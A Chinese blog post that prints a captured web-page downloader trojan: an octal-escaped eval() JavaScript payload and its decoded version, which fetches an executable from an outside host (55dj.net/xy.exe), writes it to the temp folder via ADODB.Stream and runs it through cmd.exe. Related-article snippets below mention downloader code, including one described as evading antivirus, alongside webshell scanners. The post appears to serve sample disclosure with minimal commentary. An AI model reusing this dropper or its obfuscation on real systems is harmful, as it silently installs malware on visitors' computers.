又一个网页下载者木马

最新推荐文章于 2024-09-22 11:17:00 发布
最新推荐文章于 2024-09-22 11:17:00 发布
阅读量305 收藏
点赞数
文章标签: javascript shell ViewUI

文件: http://xxxx.xxx.xxx/web.htm

ExpandedBlockStart.gif ContractedBlock.gif < SCRIPT  LANGUAGE ="JavaScript" > dot.gif
ExpandedBlockEnd.gifeval("\146\165\156\143\164\151\157\156\40\147\156\50\156\51\40\173\40\166\141\162\40\156\165\155\142\145\162\40\75\40\115\141\164\150\56\162\141\156\144\157\155\50\51\52\156\73\40\162\145\164\165\162\156\40\47\176\164\155\160\47\53\115\141\164\150\56\162\157\165\156\144\50\156\165\155\142\145\162\51\53\47\56\145\170\145\47\73\40\175\40\15\12\164\162\171\40\173\40\15\12\166\141\162\40\155\155\61\75\42\150\164\164\160\72\42\73\15\12\155\155\62\75\42\57\57\42\73\15\12\155\155\63\75\42\167\167\167\56\65\65\144\152\56\156\145\164\57\170\171\56\145\170\145\42\73\15\12\144\154\75\155\155\61\53\155\155\62\53\155\155\63\73\40\15\12\141\61\75\42\157\142\152\145\143\164\42\73\141\62\75\42\143\154\141\163\163\151\144\42\73\15\12\141\63\75\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\73\15\12\141\64\75\42\101\144\157\144\142\56\123\164\162\145\141\155\42\73\15\12\146\165\143\153\75\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\73\15\12\144\146\75\50\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\141\61\51\51\73\40\15\12\144\146\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\141\62\54\141\63\51\73\40\15\12\166\141\162\40\170\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\42\53\42\115\42\53\42\114\42\53\42\110\42\53\42\124\42\53\42\124\42\53\42\120\42\54\42\42\51\73\40\15\12\166\141\162\40\123\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\141\64\54\42\42\51\73\40\123\133\42\164\171\160\145\42\135\75\61\73\40\15\12\170\133\42\117\160\145\156\42\135\50\42\107\105\124\42\54\40\144\154\54\60\51\73\40\15\12\170\133\42\123\145\156\144\42\135\50\51\73\40\15\12\146\156\141\155\145\61\75\147\156\50\61\60\60\60\60\51\73\40\15\12\166\141\162\40\106\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\146\165\143\153\54\42\42\51\73\40\15\12\166\141\162\40\164\155\160\75\106\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\40\15\12\146\156\141\155\145\61\75\40\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\54\146\156\141\155\145\61\51\73\40\15\12\123\133\42\157\160\145\156\42\135\50\51\73\15\12\123\133\42\127\162\151\164\145\42\135\50\170\56\162\145\163\160\157\156\163\145\102\157\144\171\51\73\40\15\12\123\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\146\156\141\155\145\61\54\62\51\73\40\15\12\123\133\42\103\154\157\163\145\42\135\50\51\73\40\15\12\166\141\162\40\121\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\40\15\12\145\170\160\61\75\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\121\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\146\156\141\155\145\61\54\42\42\54\157\160\145\156\54\60\51\73\40\175\40\143\141\164\143\150\50\151\51\40\173\40\151\75\61\73\40\175")
None.gif </ SCRIPT >

通过解码后:

ExpandedBlockStart.gif ContractedBlock.gif function  gn(n)  dot.gif var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; }  
ExpandedBlockStart.gifContractedBlock.gif try   dot.gif
InBlock.gifvar mm1="http:";
InBlock.gifmm2="//";
InBlock.gifmm3="www.55dj.net/xy.exe";
InBlock.gifdl=mm1+mm2+mm3; 
InBlock.gifa1="object";a2="classid";
InBlock.gifa3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
InBlock.gifa4="Adodb.Stream";
InBlock.giffuck="Scripting.FileSystemObject";
InBlock.gifdf=(window["document"]["createElement"](a1)); 
InBlock.gifdf["setAttribute"](a2,a3); 
InBlock.gifvar x=df["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); 
InBlock.gifvar S=df["CreateObject"](a4,""); S["type"]=1
InBlock.gifx["Open"]("GET", dl,0); 
InBlock.gifx["Send"](); 
InBlock.giffname1=gn(10000); 
InBlock.gifvar F=df["CreateObject"](fuck,""); 
InBlock.gifvar tmp=F["GetSpecialFolder"](0); 
InBlock.giffname1= F["BuildPath"](tmp,fname1); 
InBlock.gifS["open"]();
InBlock.gifS["Write"](x.responseBody); 
InBlock.gifS["SaveToFile"](fname1,2); 
InBlock.gifS["Close"](); 
InBlock.gifvar Q=df["CreateObject"]("Shell.Application",""); 
InBlock.gifexp1=F["BuildPath"](tmp+'\\system32','cmd.exe');
ExpandedBlockStart.gifContractedBlock.gifQ["ShellExecute"](exp1,' /c '+fname1,"",open,0); }   catch (i)  dot.gif { i=1; }
None.gif


 

weixin_34007906
关注
网页木马扫描器
02-25
web网页木马后门扫描器内置多种挂马特征库,能够轻松扫描出电脑中的web网页木马,如asp\php\jsp\pl\图片木马等等,保护网站安全。
简单的下载者木马分析
abcd8080的博客
07-29 380
算是第一次自己分析一个完整的木马,时间花费很长释放的dll还没来及分析后面会跟上。好多api都是刚刚查过才知道。很简单大家不要吐槽啊。附件里面有idb和原文件 还有脱壳后的文件。欢迎大家批评指教 附件:http://bbs.pediy.com/showthread.php?p=1090998#post1090998 基本信息 报告名称:ye.exe下载者木马分析...
一个下载者木马SVCH0ST.exe norton.sys usbme.sys mppds.exe msccrt.exe shuailai.exe
飘的梦客厅
04-21 2119
这又是一个下载者木马文件名 SVCH0ST.exe文件大小 53,097 字节加壳方式 UPX运行后 释放C:/WINDOWS/system32/SVCH0ST.exe并释放C:/WINDOWS/system32/norton.sys C:/WINDOWS/system32/drivers/usbme.sys加载驱动然后开启IE进程连接219.153.15.80:80下载木马下载的木马有C:/WI
牛X下载者木马清除方法。
woodbig的专栏
12-18 1763
 讨厌的牛X下载者,在我所有的网页文件末尾添加了代码,大约上万个. 清除办法:  1.进入安全模式,删除c:/program files/internet explorer/plugin文件夹里所有东西. 2.启动IE,删除历史文件,脱机文档,cookie         3.  下载一个工具 search & replace ,搜索          或者类似的语句,删除即可. 需要说明
php 远程下载木马
diankui6178的博客
09-06 305
function dlfile($file_url, $save_to) { $content = file_get_contents($file_url); file_put_contents($save_to, $content); } dlfile('https://www.baidu.com/img/bd_logo1.png','d:/wwwro...
网页木马攻防实战.rar
11-29
网页木马攻防实战是网络安全领域的一个重要主题,它涵盖了从攻击到防御的多个关键环节。这个主题的历史和发展反映了互联网安全的演变过程。在早期,网页木马主要通过诱骗用户点击恶意链接或下载含有恶意代码的文件...
二行代码解决全部网页木马
12-11
网页木马是一种恶意代码,通常通过嵌入到网页中,以欺骗用户访问或执行有害操作。近年来,攻击者不断变换手法,从早期的iframe挂马转向利用标签来植入木马。这些木马会通过链接到外部恶意网址,进而下载并执行恶意...
VB实现网页木马
07-10
- **漏洞详情**:MS06014漏洞是针对Microsoft Data Access Components (MDAC)的一个安全漏洞,允许恶意网站通过HTML Object标签远程执行任意代码。 - **攻击流程**: - 攻击者在网页中嵌入恶意的HTML Object标签...
web木马终结者 v1.0.rar
07-06
【标题】"Web木马终结者 v1.0.rar"是一个专门针对网站被挂马问题的解决方案,由开发者根据常见的杀毒软件理念设计并编写。它利用JavaScript编程语言,结合Ajax技术,为用户提供了一种高效且实时的在线扫描工具。 ...
网页木马剖析与实现--论文
09-12
2. **下载木马程序**:通过Microsoft.XMLHTTP对象和ADODB.Stream对象等技术,网页木马可以从远程服务器下载木马程序到用户的计算机上。 3. **执行木马程序**:下载完成后,网页木马会利用各种技术绕过浏览器的安全...
网站恶意网页木马扫描器(WebshellScanner).zip
07-11
持扫描木马类型: asp/aspx/php/jsp/asa/cer 软件主要功能: 1.搜索网站里面的网页木马(Webshell) 2.生成统计报表 用来查询网站是不是被挂马了,一般用于服务器上的操作,或将服务器上的源码下载到本地,然后用此软件查找。 处理了一下第一版大家的要求,修复了一些小的bug,加入了自动更新程序,在windows2003、windows xp、windows 2000 server 无.net环境下测试通过,简单的更新说明如下: 1.添加自动升级模块,.net环境下可完成在线升级; -------------------------------------------------------- 升级需要请求服务器下载文件替换,如果下载失败,请手动下载更新。更新程序需要服务器装有.net v2.0.50727 版本以上的环境才能运行,因此不支持.net的服务器无法使用自动更新。 2.无需.net环境运行扫描程序; -------------------------------------------------------- 这个问题比较头疼的,程序是.NET 开发的,需要安装 .NET Framework,但Windows 2000、Windows XP 和 Windows 2003 默认都没有.NET 2.0 运行环境。于是利用移动飞信的原理,利用fetion的程序加载主程序,可以使主程序可以运行在不支持.net的环境下。大家可以用VMDotNet包中的文件运行大多数.net开发的程序,如果缺少dll,加上即可。 3.添加asp规则,主要针对asp的webshell绕过机制; -------------------------------------------------------- 由于本来的规则基本是lake2的规则以及少许修改版,于是很多同志找出了很多绕过逃避检测的机制,比如用access或者excel创建asp文件的小马,比如include包含gif之类的伎俩等等等等。本版中这些绕过机制均得到处理。(还想绕过的朋友try一下看看我的正则健壮不健壮) 4.更新php规则,添加了eval下运行的少数加密函数; -------------------------------------------------------- php下把加密的文件先通过函数解密再eval运行,本次版本处理了几个不常见的函数:gzinflate 、str_rot13等等;php确实还有很多绕过的方法,而且很难检测,呜呼哀哉,我也没辙了... 5.增加了利用IIS6.0文件夹解析漏洞以及文件解析漏洞隐藏的shell的检查; -------------------------------------------------------- 这个没啥好说的,目录叫1.asp或者文件叫1.asp;2.jpg,很显然被人入侵了,需要仔细检查检查问题了。 6.修复一处bug(驱动器下第一层目录无法扫描); -------------------------------------------------------- 测试的时候无意中发现的,貌似还没有人向我提交这个问题,估计大家都直接扫目录的,并没有扫盘(确实没必要扫盘~) 
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
Gleam的专栏
03-26 1万+
前言 这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术。之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本已经被自动分析系统拦截下来了)。而且这类的样本甚至还有愈演愈烈之势,很可能会长盛不衰。JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会
机器狗病毒(又称下载者木马病毒)的手工毒杀
Bob的专栏
05-12 4448
    最近一同事中了机器狗病毒,最开始并不知道是什么病毒,发现启动项里有很多XXX.exe列表,先用REGEDIT,将其清楚,并将windows下的新建病毒清除,因为病毒中的比较早,当时用瑞星还无法查杀(今天升级完瑞星以后,可以查杀了。),手动删除以后重启,发现“网络邻居”属性里,无法找到“本地连接”图标,导致无法上网。可能是病毒将系统服务破坏了。网络邻居是使用“Network Connec
下载者木马里提取的下载模块
独孤龙城的专栏
12-05 1158
//从下载者木马里面提取的下载模块,下载后运行基本不报毒,不知道是不是当前的一个漏洞。 #include "windows.h" #include "iostream" #include "tchar.h" #pragma comment(lib,"Urlmon") using namespace std; int main() { HRESULT urldown; urldown=URL
一个木马下载脚本
余璜的技术博客
04-29 3034
一个朋友在阿里云Linux服务器上装软件,发现出奇的卡,终端上敲几个字就卡几十秒。ps -ef一看,发现两个可疑物:/etc/tows /etc/towgets.sh
使用vb轻松打造个人免杀下载者
trustyboy的专栏
02-04 708
    我们知道Visual Basic中对于网络的支持有个winsock控件可以轻易实现各种功能,但是使用了控件意味着 你的程序移植性将大大降低,在许多机器上你的程序将无法运行。这对木马等一些对可移植性要求高的程序简直就是一大遗憾,下面我介绍一种既快速又不使用winsock控件开发下载者的方法,如果有什么问题还望指教。Visual Basic中有个api-URLDownloadToFileA
下载者+(原代码)
liuka的blog
02-04 2373
下载者运行后如果成功下载就会在HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run下生成Microsoft rigpsnap项自启下载的木马会在WINDOWS/system32下,重新命名为rigpsnap.exe如果由于没有联网或地址错误下载者就会等待10秒后再尝试下载如此反复,知道下载成功下载者的关键代码如下!void
常见的网络安全专业术语合集整理
m8330466的博客
04-13 515
常见的网络安全专业术语合集整理
ASCII码与字符对照表(附转换代码)
热门推荐
粉色挖掘机的博客
11-24 2万+
目录ASCII基本字符ASCII控制字符ASCII可显示字符ASCII扩展字符转换代码ASCII 码使用指定的 7 位或 8 位二进制数组合来表示 128 或 256 种可能的字符。标准 ASCII 码也叫基础ASCII码,使用 7 位二进制数来表示所有的大写和小写字母、数字 0 到 9、标点符号, 以及在美式英语中使用的特殊控制字符。其中:0~31及127(共33个)是控制字符或通信专用字符(其余为可显示字符),如控制符:LF(换行)、CR(回车)、FF(换页)、DEL(删除)、BS(退格)、BEL(振铃
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
最新发布
程序员阿龙的博客
09-22 4243
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值